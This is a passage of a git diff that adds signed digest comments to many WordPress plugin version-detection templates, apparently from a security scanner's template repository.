b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012846a7ac2c5b55c33327a4a6a175615ef328cbd575c5211c0721755ff4fee31022067bf4e3c926c63b5a33a395f78eebc7606310993ff724ba0e29e67b4abca238b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..4fb6384545 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b410f16998b2183ce860ee15dae98f833d09d3d830cec1ecee54c715eef69e64022067dad85683cac910313432e5803df84e6fed7735c5fa3c5d26533b29bbd0cd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..630adc7262 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202931e718a7ed1fe5ce3127eaa63b2bce379ed425f69a8f25004c446fd92144910221009b3a76b580bd9a9667c12e67bfba85aac2ed5e0bff2b5f21a5185e7139bf6cc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..62702f0e63 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e7b117dd8793a3472b6327f913102a0275e3ec3fe1befe86dcc68acf9d285d802204a0e0769802354ef4a70e8a6d58c928d30655d5cce222c6fc79d13cfe1293ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..816209079d 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205245649163a47e5a199084ff73150f3a6ff4617dc8b4d4925134e53494e707a3022100f47c84764cf087468ac853a85eb51b280fd89313776e18e3708caef85a8b7fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..d41e212955 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8d7c906c2e9cca88af3c58c7d8ecabb94153310039d17dde1bfdc3375d682c2022055a100dcfbcb33ef8d108bf902110fcf9fa9c02dd0d4150bea7bd0558a1e1465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..dfbe49cb14 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200690eb466dedf9e3c3cdf3e9b886ae03f0312b33b0a0479b3c99caa36929b32d0221009880f3409e877cb8c41b7b6506d765b0391323f4d0dc99e05debe8b0f258bf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..ebb53c8598 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1b4a6250a03bcb918a374d7eae1b6764426c43e5cc0fb0dc8b409cc1f8b7097022036d7dc1e5a181cff7497c008ded97216ffb345e0d5bd6de0bf136bb689ebdc5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..74c5894bab 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d10292f8ed8a9f3b5a08005b72d2bf763cf3e4b606b0f420c2a0fccbae89810e02201dcb72810467d70c4b3c4721475cfe5afef575faeb4e5044da542ec15abfc509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..f2d56b72ba 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022056b77d4e5b296d848bdc3b402a9f8c2bd5b52d39cb9b3016908bf2ea6149a06d0220557817d9290e2c8beb217389166eb727a6aaf76443ef6e8c1ba3c2e816cc5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..bfa693f52e 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2296541e1d47a5b6aa5966e6559ae60f0f540ad3d2a3ac01a4d626c2ff06e540221008261a1cfce7492c3948b74620bb3bf6ec655f064f58764ef8407c81b64deab71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..7bfcca0ee0 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206753cf1d015adc4ac187628342db1dfe7b4daa2c40a6307fbc7949d2783c364002200660cc2a63c5ad8928f4dcf656e38839407afe3fc68458a595f94aaa50f5ead5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..490a1fbbda 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022059bd3e8555ffe86954cf660bff282cde3d54e935322b7baa22236e03ea1efff0022100a55d5775a9b5195757a552bdf8bc4c640413ee8a9cfa838cc859f8d0ae5d7cb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..99c5cdc49a 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017136fc7f06b1163c68c792dbaab177f2806203b358126f763ef646cf890d543022100f7c1bf824da9d96a796197ef0da650f0cff03dc557da33de00ca9e0ed4a115f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..fbe764126e 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6b837ca9a54dce77a5e4f470b4fc01e71b2d3e6f3f97a03fecfadef6b856f03022075c67fc42cd86216ecb04d1a628f568df7583e18894d9954a04e64d2491a57db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..6e12cc5f56 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1301a67a640666dda200e8c6d1c331e055438476109a6549c4f6c975523f0b8022100c3896e87d77708d12db896f1e77eefda1852f915064152163672429bbc11d677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..7dee749ead 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203246d920e5683a41278f0b83b00471aaac66fd7746a75c4b00e7ca112704e8d00221009b77c445c843f7ea219d05643aaacd80971841fbbab5c16e6ea2a30e8bd1d25a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..5315ffae17 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e162dfb9aa028f8793e4a28bfd7f2ae51f1dbaafef21b2adb5b54e765209116022027aa6376a2e815336a21cc6d0e3b86013933fb68297fddad67c91aea5e2fa9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..aba93bde64 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022003c99003c78431ad6fdc1d3da3e8da386d99abbbf008bf60e5331f89ef7289ed022100d7d34e2f7a529718cb345108636db17fef60b06d865d165ee62b00c1071bd6d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..35c6aca737 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b417f3148399a19a5b02d0cd525176cae74be6ef464abd6593b08730a34801f602203c7819f302c992909681d2306edca21ef6c8d0e1fbab63d928e99eb4eac9add1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..a714a83cf5 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f0db8c3d5b0bfef644d7c6bed9eb618a8fd0ef5f3ede6c2a154a124175820ef02207bc66d945596af83b8d84732059eb63eb00d29b0506d99a7247ce16c5fa74452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..0f8e65d595 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024ceef3a175174bb5a046ac70f5a3d026f751081ba6252a437b65bfc393ada7b02201ee73ce20782da5763f0e702b2901a9b42c583405a0683cc0f22f8bd694e53a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..e606da27df 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3df6f8875b86d322fde441d9e9bf1ac8147d3fc2e16dd7d6ba5d7bc5b01e4f302203c2b0f34cd288a039a7876fcfde43c707f95cdd262035bad18765171ddcefc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..3c4b8d7233 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b5e286a6e38b888585cd6e81e7fed586e49920e29669426b6ab0ce03212833402210088b403215160884227ba3b44ba0fbf5a6f6f901676b8dd04c51efe658786b234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..59f3a576a3 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d47172b8cc4d387ab1a4a1a099de6c0ba752c3ebd6c13e69c93642709e3e007022100fc1cd748a79f444eb9b95bcd3209924054ae9ce29362403eb01b7ab02690f6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..100c1f3247 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c703c344c2d3eda76ccb6505429cc22f40449a02ff425d27811c5fe2a885881402207242b463fed517b029d5d236afb5fc17fa76203ac72bcd9bd5c7cda32fd97e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..30075abc53 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100979e636eee391f656123f25e53fa9bc5578e0a5eb55c4cfe8a6beff3b0e01606022100835348fe40515702ae039687e9a0ea9b2c5eaf1abe9241e577da6dd7b20e3db3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..7fe3621ed5 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e0dc16d09c9bdf86b2435bfb1c3b8f5728519c34160581918a4ee2c14c9c2230220087428f3d23dfd66485a97e007bae4974ec0363d4f7607c8cf92d440e3564a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..df1865d431 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220060e1e206ac695b643fc3a00062d0c0a4a4effdffd394ccd9287bf3b7ace3a8802206f790eba87577ec056b20150e69b719d5ecb242ede2a6e45bd46960c4e71ca93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..6f25144d7a 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff8bc475cb96360cd88159552d1a16d5834c478313ea7e4751ba7f716be43044022063c59a58b57746120f1d187b0b0aeb42190b9f19e0132dc2af7fcdd0de3d04f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..8bdd9ff5fd 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220548f429aff480125ad59eb4f3a55abd9004e341c4de73610f01610509b54563e0221009abc41400ed025df88753453ef390dbef34ad7661600d1fa2cb99efeb539393b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..653995dd46 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022046ff97a6aea566a22d41fc274c2d6d3b2c1d6eb7d9a8151dd8cc51756a5b100602203e329b1f25a08da5569308e2b3a2437a55058b8c25c31d2081eb0824f7881895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..9b1b531c2a 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a67999a8f34b89f78dafdea3fd03ee34f112e9d612bab3b65a9c5a7e7a567f060221008da785a09b681da86adc90dc671084fc0f385d7fe7162890ff1f8f11f0ca7285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..23568d16ad 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eef4d5274b6202a91f8a824f97e0aa7b41ccd6cd1fc8e74f9f8f625d9591b8bb0220515fd611c70f9a78488edc3769f2891fb9d6cd68b8e08abd825711b01a5d69f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..c18b71617d 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ad807f68c8d344a073a6d796c2b878b7977465bb85ab60a6cdf70cbd64a8d622022100afde7745f538b1f6c86892f71df8b3dd427a5735405021ba72eda4b0a4d8a6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..6c1108caa6 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d27064c086bb7342a00128ed684fdb4eebd1255c0ba0d8792fa605383c6e62c7022100f4130be066fe86663c4ef094bc3cb9354ce8ce46e99eed63bb536e65fc1f430c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..c07ce1aa4f 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab53ee55334b8a73931890e8b1e5d5b3e7ceb56eba2dde633eff03c4805746a1022100943db8300198dd448fd263f192377281d68ded7c83fb201205d933c90714f46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..8176c98e5f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202148eeeb3f04ea678f42a1cb1c404979deab862e3452f558f8a70dac1570648a022100bc996b252f2452ec48adb8912a756bcbced7f3128156bdec2242c1d76b74b620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..99783df32e 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206d653c207d83df862e04228721919f64217590670f7a37398bfb9a4e916954ed022100f11968222cc71f24d4b244b431c3d6810796bc665cd18b14a07122b2727a1b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..ba44a795fd 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3e37fa65b51fd729fc85b414cfa487c9669ec944bfa78099f29fb1511216e63022100f2218bcf39667ea2574304d545f7b98ccbdcfce7077806fa25eb94619b2bae44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..ea59b59420 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0a923593822ff0d29917daa1cbb8bdf7c41fe47cbeb9d3d73bcbbb8ec47018b022016927fd78933e1768e752b00393f1950b8a0be4cfe1597601779afb6a4e3e6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..00ba9936cd 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5d6c6a7ac63c2cc08ba609f1645d78898eeca5e1f1662009ef026ad04fab922022100c89b5089086e58771f03e7d3d5848a1215bc28e2ae16a2b58a37486687648e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..b2136ff15a 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000acc83ebfa8bd480806f90d9484826698d249dc982298e1535c7d24f0a84c2f02207693c3f0bccca288ca84c8164e4dac2f77971e71c44a335b5f51ded5e5f9225e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..f168b245e1 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008a207cd1b70752b838f3c56979bb0f917751984d4d4ededcc94d5d767643b6d90220072b169383d0d81a129a6c061635df96a0c188b2fa730e899eb4a6bc63d76883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..6685b6e2b5 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf70b05b6f158d4ccfa5e8deb60742e0a1967e26faa00415d48a7dc113360f20022100ed1dc00ddf79e705b38eedc11a0847f40d6bfc427beb928fa2fca8cd3baffafb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..0685750388 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6b0e8a23796358a87c53b5eb4c176c37bbf86d96eeee9ecc8c074d3ed27cc6c022100d26ec955a70170f4d3cf34d4625efd8625b5b9cb1524e2e2b3fbfcdd4dccb2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..4893861a05 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac332c4b17afa222d60f74ef9cad782530929ac09de10e8cb3c3444e6bd01fd10220387908e59ff21d629c5fa15639b32cb3b5037bac32049262f2f034620f5260da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..98d7cf165c 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e87fdfbe0ce09e286b1e932e267a6adecb171efa1bcb17dc5647261a20660d86022100e0d00f5fa2e52d80f1460b002eca7a139ccad7fd1bfe8547277021f66a139f3e:922c64590222798bb761d5b6d8e72950 \ No 